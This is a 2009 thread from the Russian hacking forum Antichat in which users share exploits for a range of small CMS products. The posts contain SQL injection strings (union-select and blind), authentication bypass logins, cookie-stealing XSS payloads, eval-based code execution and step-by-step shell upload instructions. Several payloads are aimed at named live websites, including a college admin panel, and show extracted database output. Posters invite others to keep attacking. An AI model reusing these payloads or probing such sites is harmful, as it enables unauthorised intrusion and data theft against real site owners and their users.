Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.04.2009, 14:16
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Кактус CMS
Сайт: http://cms.kaktus.kiev.ua/
SQL-injection
Уязвимый код:
gal_pages.php
PHP код:
. . .
$id_group = $_REQUEST['g'];
if ( $id_group != "" )
{
$wheregroup = " AND ig.id_group=".$id_group;
}
if ( !( $count = mysql_query( "\n\t\t\t\tSELECT COUNT(g.id_image)\n\t\t\t\t\tFROM gallery g\n\t\t\t\t\t\tLEFT JOIN gallery_itemgroups ig\n\t\t\t\t\t\tON ig.id_image=g.id_image\n\t\t\t\t\t\tLEFT JOIN gallery_groups gg\n\t\t\t\t\t\tON gg.id_group=ig.id_group\n\t\t\t\tWHERE 1=1 ".$wheregroup." AND (gg.id_group IS NULL OR gg.active='1')\n\t\t" ) ) )
{
exit( mysql_error( ) );
}
$count = mysql_fetch_row( $count );
. . .
Эксплуатация:
site.com/gallery?g=10+and+substring(version(),1,1)=5--+
Аналогично в модуле Новости
Уязвимый код:
news_pages.php
PHP код:
. . .
$id_group = $_REQUEST['g'];
if ( $id_group != "" )
{
$wheregroup = " AND n.id_group=".$id_group;
}
. . .
$count = mysql_queryresultfield( "\n\t\t\t\tSELECT COUNT(id_news)\n\t\t\t\tFROM news n\n\t\t\t\t\tLEFT JOIN news_groups ng\n\t\t\t\t\tON ng.id_group=n.id_group\n\t\t\t\t\tLEFT JOIN core_lang_varchar l\n\t\t\t\t\tON l.id=n.id_title AND l.lang=".LANG.( "\t\t\t\t\t\n\t\t\t\tWHERE l.value<>'' AND n.kind=".$kind." {$wheregroup} AND (n.id_group IS NULL OR ng.active='1') {$monthfilter}\n\t\t" ) );
Эксплуатация:
site.com/news?g=10+and+substring(version(),1,1)=5--+
|
|
|
16.05.2009, 15:23
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
Zestos CMS homepage:http://www.netsitecms.co.uk/
Цена - Zestos CMS perpetual license £4,750 (?7,125)
Пока не заплатишь не получишь. Поэтому и нет уязвимого кода((
Sql-inj Example:
http://www.bim-online.com/playmovie.php?contid=-40+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9,10/*
Админка: /admin/
PHP код:
Так как нет сорцов - неизвестно название таблицы с юзерами, и разные мелочи...
На домашней странице внизу любезно предоставлены клиенты этой конторы :rolleyes:
Среди них Банк Ирландии какой-то.
|
|
|
|
SiteWorks Professional v5.0 |
28.08.2009, 15:31
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
SiteWorks Professional v5.0
SiteWorks Professional
Версия: 5.0 и более ранние
Дорк: "Powered By SiteWorksPro"
Доступ в админку:
/admin/
Login: admin' or 1=1-- -
Выполнение кода:
/admin/setup.php
Site name: {${eval('phpinfo();')}}
|
|
|
|
30.08.2009, 17:03
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675
Репутация:
10
|
|
SMS-PARTNERS CMS
http://demo.sms-partners.ru/page-contacts/%3E'%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E
|
|
|
|
01.09.2009, 19:35
|
|
Познающий
Регистрация: 01.08.2008
Сообщений: 42
Провел на форуме:
670601
Репутация:
50
|
|
sql-injection in PHPKB 1.5 # старые версии 1.5, в новых багу пропатчили но версию не сменили
Online Knowledgebase Builder System
target/admin
login: admin' or 1=1/*
pass: fackthemall
пример:
panther.hartnell.edu/faqs/admin/
|
|
|
|
10.09.2009, 20:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
PromoCMS
ТИЦ: 150
PR: 0
site : http://www.promopx.ru/
result :
http://www.promopx.ru/portfolio/category.php?branch=17&service=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--
5.0.22  romopx@localhost romopx-rus_db
копать колонки тут смысла не видел , так как бэйсик авторизация
PS пытал счастье, но облом, пытайте счастье  если хотите
|
|
|
|
12.10.2009, 08:23
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
CustomCMS (CCMS)
Цена: ~55 $
Активная XSS
/inbox.html
В теле письма
"><script>alert();</script>
/notepad.html
</textarea><script>alert(document.cookie);</script>
/index.php?page=Edit+Profile
Уязвимы все поля
"><script>alert();</script>
/newthread-1.html
В Title
<script>alert();</script>
Пассивные XSS
/pm.php?action=Send&rec=1"><script>alert();</script>
/gamesearch.html
в поле Search
"><script>alert();</script>
/index.php?page=Articles&action=showarticle&id="><s cript>alert();</script>
SQL Инъекции:
/link.php?id=-1'+unIon+select+1,2,3,4,5,6,7,concat_ws(0x3a,user( ),version(),database()),9,10,11+--+
Будет 404
У меня например вывелось.
Forbidden
You don't have permission to access /root@localhost:5.0.45-community-nt:cccms on this server.
/ad_out.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10/*
6 Поле делат редирект.
/index.php?page=Files&action=showfile&id=1'+union+s elect+1,2,3,concat_ws(0x3a,user(),version(),databa se()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26/*
/index.php?page=Companies&action=show&t=Agetec'+uni on+select+1,concat_ws(0x3a,user(),version(),databa se()),3,4,5,6,7,8+--+
Раскрытие путей
/thumbnailer.php?type []=avatar
Выполнение произвольного кода через админку:
/admincp/index.php?page=Settings&op=Templates&action=edit&f ile=company.php
/templates/company.php?shell=phpinfo();
PS
Боже мой...
(с) Ctacok Специально для Antichat.ru
Последний раз редактировалось Ctacok; 15.12.2009 в 07:10..
|
|
|
|
14.11.2009, 01:54
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
Заливка шелла в ABO.CMS
[1] Управление -> Скрипты -> Добавить скрипт: Название: test
Описание: test
Содержимое: <?phpinfo();?>
Сохранить [2] Страницы и структура -> Выбираем страницу (предположим что это будет "Новости") -> Выбираем поле (кликаем на него) и выбираем модуль Скрипты (кликаем на него) и жмем Добавить модуль -> Сохранить
Переходим на ту страницу куда добавили модуль (предположим что это будет "Новости"). |
|
|
|
17.11.2009, 19:32
|
|
Новичок
Регистрация: 15.11.2009
Сообщений: 8
Провел на форуме:
31294
Репутация:
79
|
|
Saitika CMS
http://saitika.ru/
Blind SQL inj
news_see.php?r=1&id=1[SQL]
Конкретный пример:
http://pack4.saitika.ru/news_see.php?r=258&id=14+and+substring(@@version,1 ,1)=5
-------------------------------------------------------------------
Site edit CMS
http://siteedit.ru/
Passive XSS
http://free.siteedit.ru/new/?lang=>=''/<script>alert(/xss,xss/)</script>
-------------------------------------------------------------------
(с) Twin $park
Последний раз редактировалось Twin $park; 23.12.2009 в 22:23..
|
|
|
|
23.11.2009, 01:33
|
|
Новичок
Регистрация: 15.11.2009
Сообщений: 8
Провел на форуме:
31294
Репутация:
79
|
|
CMS I-market
http://www.i-market.ru/
Blind SQL inj
пример:
http://www.vip-saynu.ru/articles/?id=2+and+substring(@@version,1,1)=4
(с) Twin $park
Последний раз редактировалось Twin $park; 23.12.2009 в 22:23..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
